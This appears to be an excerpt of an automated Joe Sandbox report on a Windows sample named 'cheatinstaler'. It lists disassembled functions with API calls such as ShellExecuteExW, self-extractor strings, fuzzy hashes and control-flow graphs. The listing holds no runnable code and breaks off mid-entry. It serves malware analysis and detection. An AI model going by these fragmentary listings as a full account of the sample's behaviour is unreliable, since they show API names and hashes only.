                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                  • API String ID: 3629253777-3268106645
                                                                                                  • Opcode ID: c1941742baf2d9c3be52f390a0a923855bad3b4b9f203786c8d0fad0fa7aba42
                                                                                                  • Instruction ID: d7cf854d2d8fa313f87b732558c737960786e6daa4bcd6aca25e207932b18579
                                                                                                  • Opcode Fuzzy Hash: c1941742baf2d9c3be52f390a0a923855bad3b4b9f203786c8d0fad0fa7aba42
                                                                                                  • Instruction Fuzzy Hash: F662BF22A1969285EF10EF26D4682BD2365FF44789F808136DADE877D5EF3CE544E340

                                                                                                  Similarity
                                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                  • String ID: H
                                                                                                  • API String ID: 3432403771-2852464175
                                                                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                  • Instruction ID: e1dca8b991296e2cf5584c993aebd3b58ccfa4125b11f3a6365251b6b6262fec
                                                                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                  • Instruction Fuzzy Hash: 98916822B04B128AEB50CFA6D8446AC33B5FF09B9AB044235DEDD97754EF38E545E340

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1991 7ff6c16df4e0-7ff6c16df523 1992 7ff6c16df894-7ff6c16df8b9 call 7ff6c16b1fa0 call 7ff6c16e2320 1991->1992 1993 7ff6c16df529-7ff6c16df565 call 7ff6c16e3cf0 1991->1993 1999 7ff6c16df56a-7ff6c16df571 1993->1999 2000 7ff6c16df567 1993->2000 2002 7ff6c16df573-7ff6c16df577 1999->2002 2003 7ff6c16df582-7ff6c16df586 1999->2003 2000->1999 2004 7ff6c16df57c-7ff6c16df580 2002->2004 2005 7ff6c16df579 2002->2005 2006 7ff6c16df58b-7ff6c16df596 2003->2006 2007 7ff6c16df588 2003->2007 2004->2006 2005->2004 2008 7ff6c16df59c 2006->2008 2009 7ff6c16df628 2006->2009 2007->2006 2011 7ff6c16df5a2-7ff6c16df5a9 2008->2011 2010 7ff6c16df62c-7ff6c16df62f 2009->2010 2012 7ff6c16df631-7ff6c16df635 2010->2012 2013 7ff6c16df637-7ff6c16df63a 2010->2013 2014 7ff6c16df5ae-7ff6c16df5b3 2011->2014 2015 7ff6c16df5ab 2011->2015 2012->2013 2018 7ff6c16df660-7ff6c16df673 call 7ff6c16c63ac 2012->2018 2013->2018 2019 7ff6c16df63c-7ff6c16df643 2013->2019 2016 7ff6c16df5e5-7ff6c16df5f0 2014->2016 2017 7ff6c16df5b5 2014->2017 2015->2014 2023 7ff6c16df5f2 2016->2023 2024 7ff6c16df5f5-7ff6c16df5fa 2016->2024 2020 7ff6c16df5ca-7ff6c16df5d0 2017->2020 2034 7ff6c16df675-7ff6c16df693 call 7ff6c16d13c4 2018->2034 2035 7ff6c16df698-7ff6c16df6ed call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c32a8 call 7ff6c16b1fa0 2018->2035 2019->2018 2021 7ff6c16df645-7ff6c16df65c 2019->2021 2025 7ff6c16df5d2 2020->2025 2026 7ff6c16df5b7-7ff6c16df5be 2020->2026 2021->2018 2023->2024 2028 7ff6c16df600-7ff6c16df607 2024->2028 2029 7ff6c16df8ba-7ff6c16df8c1 2024->2029 2025->2016 2030 7ff6c16df5c3-7ff6c16df5c8 2026->2030 2031 7ff6c16df5c0 2026->2031 2036 7ff6c16df60c-7ff6c16df612 2028->2036 2037 7ff6c16df609 2028->2037 2032 7ff6c16df8c3 2029->2032 2033 7ff6c16df8c6-7ff6c16df8cb 2029->2033 2030->2020 2039 7ff6c16df5d4-7ff6c16df5db 2030->2039 2031->2030 2032->2033 2040 7ff6c16df8de-7ff6c16df8e6 2033->2040 2041 
7ff6c16df8cd-7ff6c16df8d4 2033->2041 2034->2035 2058 7ff6c16df742-7ff6c16df74f ShellExecuteExW 2035->2058 2059 7ff6c16df6ef-7ff6c16df73d call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c5b60 call 7ff6c16b1fa0 2035->2059 2036->2029 2038 7ff6c16df618-7ff6c16df622 2036->2038 2037->2036 2038->2009 2038->2011 2044 7ff6c16df5e0 2039->2044 2045 7ff6c16df5dd 2039->2045 2048 7ff6c16df8eb-7ff6c16df8f6 2040->2048 2049 7ff6c16df8e8 2040->2049 2046 7ff6c16df8d6 2041->2046 2047 7ff6c16df8d9 2041->2047 2044->2016 2045->2044 2046->2047 2047->2040 2048->2010 2049->2048 2060 7ff6c16df755-7ff6c16df75f 2058->2060 2061 7ff6c16df846-7ff6c16df84e 2058->2061 2059->2058 2063 7ff6c16df76f-7ff6c16df772 2060->2063 2064 7ff6c16df761-7ff6c16df764 2060->2064 2066 7ff6c16df882-7ff6c16df88f 2061->2066 2067 7ff6c16df850-7ff6c16df866 2061->2067 2069 7ff6c16df774-7ff6c16df77f call 7ff6c171e188 2063->2069 2070 7ff6c16df78e-7ff6c16df7ad call 7ff6c171e1b8 call 7ff6c16dfe24 2063->2070 2064->2063 2068 7ff6c16df766-7ff6c16df76d 2064->2068 2066->1992 2072 7ff6c16df87d call 7ff6c16e220c 2067->2072 2073 7ff6c16df868-7ff6c16df87b 2067->2073 2068->2063 2074 7ff6c16df7e3-7ff6c16df7f0 CloseHandle 2068->2074 2069->2070 2090 7ff6c16df781-7ff6c16df78c ShowWindow 2069->2090 2070->2074 2099 7ff6c16df7af-7ff6c16df7b2 2070->2099 2072->2066 2073->2072 2078 7ff6c16df8fb-7ff6c16df903 call 7ff6c16e7904 2073->2078 2080 7ff6c16df7f2-7ff6c16df803 call 7ff6c16d13c4 2074->2080 2081 7ff6c16df805-7ff6c16df80c 2074->2081 2080->2081 2088 7ff6c16df82e-7ff6c16df830 2080->2088 2081->2088 2089 7ff6c16df80e-7ff6c16df811 2081->2089 2088->2061 2095 7ff6c16df832-7ff6c16df835 2088->2095 2089->2088 2094 7ff6c16df813-7ff6c16df828 2089->2094 2090->2070 2094->2088 2095->2061 2098 7ff6c16df837-7ff6c16df845 ShowWindow 2095->2098 2098->2061 2099->2074 2101 7ff6c16df7b4-7ff6c16df7c5 GetExitCodeProcess 2099->2101 2101->2074 2102 7ff6c16df7c7-7ff6c16df7dc 2101->2102 2102->2074
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                  • API String ID: 1054546013-3607691742
                                                                                                  • Opcode ID: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                                                                                                  • Instruction ID: ba380088b11c62655b69a318d3d6943d4165fed163de26730223a61792de494a
                                                                                                  • Opcode Fuzzy Hash: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                                                                                                  • Instruction Fuzzy Hash: D4C18F62F1860295FB10DF27E9502B923B1AF95B82F6440B1DACDC7BA5DF3CE4929340

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 4119318379-0
                                                                                                  • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                  • Instruction ID: 67b7d9805271181ae970d12952c0b4cd436be142906249843c76d14e4e3bc2b0
                                                                                                  • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                  • Instruction Fuzzy Hash: CE41D531B1464286F700DF62E820BAE3360EB89B9AF641135DD8E47B96CF7DD4458764
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                                                                                                  • Instruction ID: dc609190e75a2c92d0de149e3f6e4a4a8ed1cad562f3d9f0642dc69cb0807824
                                                                                                  • Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                                                                                                  • Instruction Fuzzy Hash: 5212D262F0874184EB10CF66D4442AD6372EB457A9F404276EADC97AEADF3CE586E340

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3536497005-0
                                                                                                  • Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                                  • Instruction ID: 1d5c95053de4f57f5608424e503a3894dd3efcf03ed7ce7ed97c904cc72e2ddc
                                                                                                  • Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                                                                                                  • Instruction Fuzzy Hash: 7D61F266A1878186EB209F2AE45036E67A1BB857A8F101338DEE943AD8DF3DD054D744

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                  • API String ID: 3540648995-3493335439
                                                                                                  • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                                  • Instruction ID: 7462bcf18850036b8d49be627d27291dfdf8c8a39fcae0157203e015f7239e26
                                                                                                  • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                                  • Instruction Fuzzy Hash: 7E319032A14A1684EF00DF6AE8841AC3371FB48B99F140171DEED977A9DF38E182D344

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 2347093688-3352871620
                                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                  • Instruction ID: 0e2aa29ca81e46c6c517667a060886190d01b09b1233e566492f145b896ca6f6
                                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                  • Instruction Fuzzy Hash: 4B118621B0964242FF64FF23A6587795392AF89BC6F280034DDDD87B9ADE2CE814D700

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1266772231-0
                                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                  • Instruction ID: 5e73a8bcca8494c47fc6de15bd20d685c0880ec123a3783e5799b8dc60bda1d4
                                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                  • Instruction Fuzzy Hash: DEF0F936B3854282FB519F22E8A5A766361FFD0B46FA05431EACEC2955DF2CD508EB10

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                  • String ID: EDIT
                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                  • Instruction ID: d8ce63009127d746acdfba25e33428f8e57e8bb01dca4c8e05ee64f7d844cf77
                                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                  • Instruction Fuzzy Hash: 20018161B18A8381FB209F23F8207F66390AF99746F544031CDCE87755DE3CE149EA50

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$Handle
                                                                                                  • String ID:
                                                                                                  • API String ID: 4209713984-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                                  • String ID:
                                                                                                  • API String ID: 3750147219-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2359106489-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452418845-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2244327787-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16CECD8: ResetEvent.KERNEL32 ref: 00007FF6C16CECF1
                                                                                                    • Part of subcall function 00007FF6C16CECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CED07
                                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CE974
                                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00007FF6C16CE993
                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6C16CE9AA
                                                                                                  • CloseHandle.KERNEL32 ref: 00007FF6C16CE9B7
                                                                                                    • Part of subcall function 00007FF6C16CEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA63
                                                                                                    • Part of subcall function 00007FF6C16CEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2143293610-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$CreatePriority
                                                                                                  • String ID: CreateThread failed
                                                                                                  • API String ID: 2610526550-3849766595
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                  • String ID: riched20.dll
                                                                                                  • API String ID: 174490985-3360196438
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16D853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6C16D856C
                                                                                                    • Part of subcall function 00007FF6C16CAAE0: LoadStringW.USER32 ref: 00007FF6C16CAB67
                                                                                                    • Part of subcall function 00007FF6C16CAAE0: LoadStringW.USER32 ref: 00007FF6C16CAB80
                                                                                                    • Part of subcall function 00007FF6C16B1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16B1FFB
                                                                                                    • Part of subcall function 00007FF6C16B129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C16B1396
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16E01BB
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16E01C1
                                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6C16E01F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 3106221260-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2371198981-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2272807158-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2176759853-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1875163511-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1203560049-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3118131910-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1203560049-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
